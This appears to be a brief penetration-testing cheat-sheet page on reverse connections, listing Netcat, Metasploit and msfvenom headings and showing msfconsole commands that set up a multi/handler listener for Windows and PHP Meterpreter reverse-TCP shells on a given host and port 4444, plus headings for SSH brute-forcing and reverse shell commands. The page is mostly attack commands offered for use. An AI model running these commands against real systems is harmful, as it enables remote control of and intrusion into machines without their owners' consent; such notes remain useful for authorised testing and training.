π―Reverse Connection & Exploitation
Netcat
Metasploit
$ msfconsole
msf5> use exploit/multi/handler
msf5 exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf5 exploit(handler)> set payload php/meterpreter_reverse_tcp
msf5 exploit(handler)> set lhost 192.168.0.1
msf5 exploit(handler)> set lport 4444
msf5 exploit(handler)> exploitAdd routing protocols in msfconsole
Use SSH Bruteforce in msfconsole
msfvenom
Collection of Reverse shell [Commands]
Last updated